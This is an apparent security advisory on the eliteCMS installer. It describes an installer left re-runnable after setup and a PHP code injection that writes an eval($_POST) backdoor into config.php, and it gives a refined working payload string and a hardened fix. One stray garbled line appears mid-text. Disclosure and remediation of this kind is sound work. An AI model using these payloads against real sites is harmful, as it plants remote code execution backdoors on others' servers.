eliteCMS's installer is not locked once installation has finished, so an attacker can re-run the whole installation simply by requesting the installer's URL. That alone is bad (the database settings can be repointed at will), and it is also what makes the second issue reachable on a deployed site.

The second vulnerability is that the installer can be made to write a one-line PHP backdoor straight into admin/includes/config.php.
Let's look at the code (step 4 of the installer, which generates config.php):
    ...
    elseif ($_GET['step'] == "4") {
        $file = "../admin/includes/config.php";
        $write = "<?php\n";
        $write .= "/**\n";
        $write .= "*\n";
        $write .= "*eliteCMS-The LightweightCMS Copyright 2008 elite-graphix.net.\n";
        ... omitted ...
        $write .= "*\n";
        $write .= "*/\n";
        $write .= "\n";
        // The session values are interpolated directly into the generated PHP
        // source inside a double-quoted literal, with no escaping or validation.
        $write .= "define(\"DB_SERVER\", \"{$_SESSION['DB_SERVER']}\");\n";
        $write .= "define(\"DB_NAME\", \"{$_SESSION['DB_NAME']}\");\n";
        $write .= "define(\"DB_USER\", \"{$_SESSION['DB_USER']}\");\n";
        $write .= "define(\"DB_PASS\", \"{$_SESSION['DB_PASS']}\");\n";
        $write .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";
        $write .= "if (!\$connection) {\n";
        $write .= "    die(\"Database connection failed\" .mysql_error());\n";
        $write .= "    \n";
        $write .= "} \n";
        $write .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";
        $write .= "if (!\$db_select) {\n";
        $write .= "    die(\"Database select failed\" .mysql_error());\n";
        $write .= "    \n";
        $write .= "} \n";
        $write .= "?>\n";

        // Whatever was assembled above is written verbatim to config.php.
        $writer = fopen($file, 'w');
        ...
% a; B3 i( s2 z3 H
Now look at the code that fills those session values (an earlier installer step):
    // Raw POST data is copied into the session as-is.
    $_SESSION['DB_SERVER'] = $_POST['DB_SERVER'];
    $_SESSION['DB_NAME'] = $_POST['DB_NAME'];
    $_SESSION['DB_USER'] = $_POST['DB_USER'];
    $_SESSION['DB_PASS'] = $_POST['DB_PASS'];
The values are taken over without any validation at all. If the database name POSTed is:

    "?><?php eval($_POST[c]);?><?php

the installer writes a one-line backdoor into /admin/includes/config.php.

Two caveats before relying on that exact string. First, the generated line becomes define("DB_NAME", ""?><?php eval($_POST[c]);?><?php"); and PHP treats the first ?> as the end of the statement, leaving define( without its closing parenthesis, so the resulting config.php is a parse error: the backdoor is on disk but never executes, and everything that includes config.php breaks. A value that closes the define() call before the injected code, such as ");eval($_POST[c]);// , produces a file that both parses and runs. Second, the double quote only survives the request if magic_quotes_gpc is off; with it on (the php.ini default up to PHP 5.3), $_POST['DB_NAME'] arrives with the quote backslash-escaped and the escaped quote stays inside the string literal instead of terminating it.
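As an added example (not eliteCMS's own code), here is what a hardened replacement for this step-4 writer could look like. The install.lock file, the assertIdentifier/buildConfig helper names, the allowed identifier character set, PHP 7 syntax and a php CLI binary on PATH are all assumptions made for the illustration; it reads the values from $_POST directly rather than from the session for brevity.

```php
<?php
// Added example, not eliteCMS code. Assumptions: install.lock lives next to
// this script, the "php" CLI is on PATH, PHP 7+ syntax.

// 1. Refuse to run at all once installation has completed.
//    A successful run creates install.lock at the end (see step 5).
$lockFile = __DIR__ . '/install.lock';
if (file_exists($lockFile)) {
    header('HTTP/1.1 403 Forbidden');
    exit('Installer is locked. Delete install/install.lock to reinstall.');
}

// 2. Validate the values before they go anywhere near generated code.
//    Host, database and user names are restricted to a conservative character
//    set (assumed here; widen it if your environment needs more). The password
//    may legitimately contain anything, so it is never validated, only escaped.
function assertIdentifier(string $name, string $value): void
{
    if (!preg_match('/\A[A-Za-z0-9_.:\-]{1,64}\z/', $value)) {
        exit(htmlspecialchars("Invalid value for $name"));
    }
}

$db = [
    'DB_SERVER' => (string)($_POST['DB_SERVER'] ?? ''),
    'DB_NAME'   => (string)($_POST['DB_NAME'] ?? ''),
    'DB_USER'   => (string)($_POST['DB_USER'] ?? ''),
    'DB_PASS'   => (string)($_POST['DB_PASS'] ?? ''),
];
foreach (['DB_SERVER', 'DB_NAME', 'DB_USER'] as $k) {
    assertIdentifier($k, $db[$k]);
}

// 3. Emit PHP literals instead of concatenating raw text into source.
//    var_export() produces a single-quoted literal with ' and \ escaped, so a
//    value containing quotes or PHP open/close tags stays inside the string
//    and can never terminate it or start a new code block.
function buildConfig(array $db): string
{
    $out = "<?php\n";
    foreach ($db as $k => $v) {
        $out .= sprintf("define(%s, %s);\n", var_export($k, true), var_export($v, true));
    }
    return $out;
}

$config = buildConfig($db);

// 4. Write to a temp file, syntax-check it, then move it into place, so a
//    generation bug can never leave a half-written or unparsable config.php.
$target = __DIR__ . '/../admin/includes/config.php';
$tmp    = $target . '.tmp';
if (file_put_contents($tmp, $config, LOCK_EX) === false) {
    exit('Could not write config');
}
exec('php -l ' . escapeshellarg($tmp), $lintOut, $lintRc);
if ($lintRc !== 0) {
    unlink($tmp);
    exit('Generated config failed syntax check');
}
rename($tmp, $target);

// 5. Lock the installer now that everything succeeded.
file_put_contents($lockFile, date('c') . "\n");
```

With this writer the payload from the text is rejected at step 2 by the identifier check, and even if the check were dropped, var_export() would turn it into the harmless literal '"?><?php eval($_POST[c]);?><?php' assigned to DB_NAME. The lock check is the fix for the first issue; deleting the install directory after a successful run is a simpler alternative that many projects prefer.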